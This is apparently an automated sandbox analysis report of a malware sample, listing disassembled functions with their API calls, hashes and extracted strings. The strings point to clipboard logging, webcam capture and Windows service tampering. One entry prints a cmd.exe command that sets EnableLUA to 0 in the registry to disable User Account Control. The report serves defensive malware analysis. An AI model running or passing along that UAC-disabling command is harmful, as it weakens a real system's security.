                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: b56df2ec526ecb605ad204b00dc5db07d06cb4bbbde3923a820af03cd63327b9
                                                          • Instruction ID: 5399b0f9a6461ae69e9bde9777a653eaf6085cdcce353b40ae7049a42401d5b7
                                                          • Opcode Fuzzy Hash: b56df2ec526ecb605ad204b00dc5db07d06cb4bbbde3923a820af03cd63327b9
                                                          • Instruction Fuzzy Hash: 15810B72A00706ABE724BA79CC41B6B73E89F89768F24522FF411D7781E7B8DD008758
                                                          Function 00444D4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 59a84199312040bebd3b7080c8be9dd535ae7880d2ee6b6a8de25d9cd02a2692
                                                          • Instruction ID: 890c16c57639ce4616fdae23c1b2cf08611ffd87950db76db0bf4773250d0152
                                                          • Opcode Fuzzy Hash: 59a84199312040bebd3b7080c8be9dd535ae7880d2ee6b6a8de25d9cd02a2692
                                                          • Instruction Fuzzy Hash: 2C512972900205ABFB249BA98C41FAF77A9EFC8324F24411FF815D6292DB3DDD11966C
                                                          Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                            • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                          • API String ID: 3469354165-3054508432
                                                          • Opcode ID: a571c00ded84ac1c02560f50a488ee548fe76179a7eec9e921c662aaf166c676
                                                          • Instruction ID: 0fabaa65846f565374d927adde4572b2cc1454b627dc53539f04e4ca1ee376cc
                                                          • Opcode Fuzzy Hash: a571c00ded84ac1c02560f50a488ee548fe76179a7eec9e921c662aaf166c676
                                                          • Instruction Fuzzy Hash: 4641B031A0420196C614FF75C956AAD3BA59B81708F00453FF809A72E6DF7C9A85C7CF
                                                          Function 00419FE2 Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 00419FF2
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A006
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A013
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,004196FD), ref: 0041A048
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A05A
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A05D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          • Opcode ID: 65b9834a0bb4e8b96eb35e8af166575ebded0736ec3647688d6b347b4d29b64b
                                                          • Instruction ID: 3721d8981427c9c50277447f2eb78ca90bee9705940f35750f03ddb94c099399
                                                          • Opcode Fuzzy Hash: 65b9834a0bb4e8b96eb35e8af166575ebded0736ec3647688d6b347b4d29b64b
                                                          • Instruction Fuzzy Hash: 28016D315062107ED2111F349C0EEBF3E1CDF567B1F00022FF522A22D2DE69CE8981AA
                                                          Function 00438016 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043800D,004379C1), ref: 00438024
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438032
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043804B
                                                          • SetLastError.KERNEL32(00000000,?,0043800D,004379C1), ref: 0043809D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 3d2ceef5274e4dce0ae2caf7dfaf84fccaef2f9a96c7b33c4be4e75810a8a5f0
                                                          • Instruction ID: c897193d57ecee64636fe05851fbd3cadc70b6e754ca2b2668497838eaebe06c
                                                          • Opcode Fuzzy Hash: 3d2ceef5274e4dce0ae2caf7dfaf84fccaef2f9a96c7b33c4be4e75810a8a5f0
                                                          • Instruction Fuzzy Hash: DC0190321083416DFB2823756C465377B68E709378F21123FF328515F1EF994C44514C
                                                          Function 004470CF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                          • _free.LIBCMT ref: 00447106
                                                          • _free.LIBCMT ref: 0044712E
                                                          • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                          • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                          • _abort.LIBCMT ref: 0044714D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: ae40a63e46beb22daa4956e078090859b5f7183b7e2bf3c5c9b8e84b2b7f2479
                                                          • Instruction ID: 03a1e9305cc52ab1e573739f72da4c843e3c1f7cd4612cbd08a2c6f68691a865
                                                          • Opcode Fuzzy Hash: ae40a63e46beb22daa4956e078090859b5f7183b7e2bf3c5c9b8e84b2b7f2479
                                                          • Instruction Fuzzy Hash: F2F0F931508B1027F612777A6C46E1B15269BC17B6B26002FF509A6392EF2C8C07911D
                                                          Function 00419E16 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E25
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E39
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E46
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E55
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E67
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419991,00000000,00000000), ref: 00419E6A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 0c1a15e356219896acdb347c35b0c45111e5d78bcfdfe9148325f151f6ad1740
                                                          • Instruction ID: 47980c42e9b022aba05d73d81e1ae7aa31c0ed05cef52b60765f03c540efa169
                                                          • Opcode Fuzzy Hash: 0c1a15e356219896acdb347c35b0c45111e5d78bcfdfe9148325f151f6ad1740
                                                          • Instruction Fuzzy Hash: 44F062319003186BD611AB65DC89EBF3B6CDB45BA1F01002AF906A21D2DF78DD4A95F5
                                                          Function 00419F7D Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419F8C
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FA0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FAD
                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FBC
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FCE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041988D,00000000,00000000), ref: 00419FD1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 5b24b4e27fffc125df5634aa0be26648fed0954f23ddfe4314b62b15434ff522
                                                          • Instruction ID: cbb6f8d25e78bf3f904679f952f169c6c08018e661e4ba535c0ca8fa304c3d8e
                                                          • Opcode Fuzzy Hash: 5b24b4e27fffc125df5634aa0be26648fed0954f23ddfe4314b62b15434ff522
                                                          • Instruction Fuzzy Hash: 68F0C2315002147BD2116B24DC49EBF3A6CDB45BA1B01002AFA06A2192DF78CE4A85B8
                                                          Function 00419F18 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F27
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F3B
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F48
                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F57
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F69
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041990F,00000000,00000000), ref: 00419F6C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 8b5bee833df7660f85241f437fe153c135d0241f59d488d3ebe91362aced60b6
                                                          • Instruction ID: 95d7f5aa039a93820bb4883d7663946178ed8a5ec9cf590f88e81ba893971d89
                                                          • Opcode Fuzzy Hash: 8b5bee833df7660f85241f437fe153c135d0241f59d488d3ebe91362aced60b6
                                                          • Instruction Fuzzy Hash: 7EF062715003147BD2116B65DC4AEBF3B6CDB45BA1B01002AFA06B2192DF78DD4A96B9
                                                          Function 00412A82 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412AF5
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412B24
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412BC5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$TG
                                                          • API String ID: 3554306468-170812940
                                                          • Opcode ID: 63fafdce963b054f75e0ec9a91e8ba00106c89ff40fb0d126c08ff78ed9ae450
                                                          • Instruction ID: eeb20da9b05a32976bf12a6402f5e40020a9f6991e42d7db5c0f7bae6a1218cc
                                                          • Opcode Fuzzy Hash: 63fafdce963b054f75e0ec9a91e8ba00106c89ff40fb0d126c08ff78ed9ae450
                                                          • Instruction Fuzzy Hash: C5511E72108345AED310EF61D985DEFB7ECEF84704F00492EB585D2191EB74EA088BAA
                                                          Function 00441C91 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: E
                                                          • API String ID: 0-2089609516
                                                          • Opcode ID: 06f5741e10c63ae8bf02417847894b944428abddfdd2a378d9b946abe0f64cd5
                                                          • Instruction ID: 88518833c1d7008d36d723bd78668d328a40e80baed6ee8e3f57c0ed0377fbed
                                                          • Opcode Fuzzy Hash: 06f5741e10c63ae8bf02417847894b944428abddfdd2a378d9b946abe0f64cd5
                                                          • Instruction Fuzzy Hash: FE413AB1A00704BFE7249F39CC41BAABBA8EB84718F10412FF405DB291D379A9418788
                                                          Function 0041AA28 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041265C: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0041267E
                                                            • Part of subcall function 0041265C: RegQueryValueExW.ADVAPI32(?,0040E18D,00000000,00000000,?,00000400), ref: 0041269D
                                                            • Part of subcall function 0041265C: RegCloseKey.ADVAPI32(?), ref: 004126A6
                                                            • Part of subcall function 0041B366: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B377
                                                            • Part of subcall function 0041B366: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B37E
                                                          • _wcslen.LIBCMT ref: 0041AB01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                          • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 3286818993-4246244872
                                                          • Opcode ID: 91537cc37855c4d4d30a4d4a060cf2929123fb739607bd98f20b22aa84b26542
                                                          • Instruction ID: 944f249e3467cd2310196e71108a033bc811508d99a3a404dc4e3305fa2889c9
                                                          • Opcode Fuzzy Hash: 91537cc37855c4d4d30a4d4a060cf2929123fb739607bd98f20b22aa84b26542
                                                          • Instruction Fuzzy Hash: 8621A772B001042BDB04B6B58C96EFE366D9B84318B10087FF452B71D3EE3C9D554269
                                                          Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                            • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                            • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                          • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                            • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                            • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$TmG$XmG
                                                          • API String ID: 2974294136-1855599884
                                                          • Opcode ID: 6be3199e03e4d79244a0686247a10a62383e0a85fc1942f24318a510031ea9ae
                                                          • Instruction ID: 2623299308dd9d50029d580546b1e3590cd03a5acc49d0be8ee118f943746456
                                                          • Opcode Fuzzy Hash: 6be3199e03e4d79244a0686247a10a62383e0a85fc1942f24318a510031ea9ae
                                                          • Instruction Fuzzy Hash: FB216131A102155ACB24FB65D8929EE7775AF54318F10403FF506772E2EF3C6E4A868D
                                                          Function 0041CC2A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegisterClassExA.USER32(00000030), ref: 0041CC77
                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CC92
                                                          • GetLastError.KERNEL32 ref: 0041CC9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: 2bfcb1dee2ed81dd37ad325623522de50802513b554cdfc95296743f6fff5b81
                                                          • Instruction ID: c9edb97a89f7ec8dfbaa779d36c224b53f51aa00da94833f787b12e8c600820c
                                                          • Opcode Fuzzy Hash: 2bfcb1dee2ed81dd37ad325623522de50802513b554cdfc95296743f6fff5b81
                                                          • Instruction Fuzzy Hash: 2001E9B1D1021DAF8B00DF9ADCC49EFFBBDBE49355B50452AE414B6100EB708A458AA5
                                                          Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                          • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                          • CloseHandle.KERNEL32(?), ref: 00406A14
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
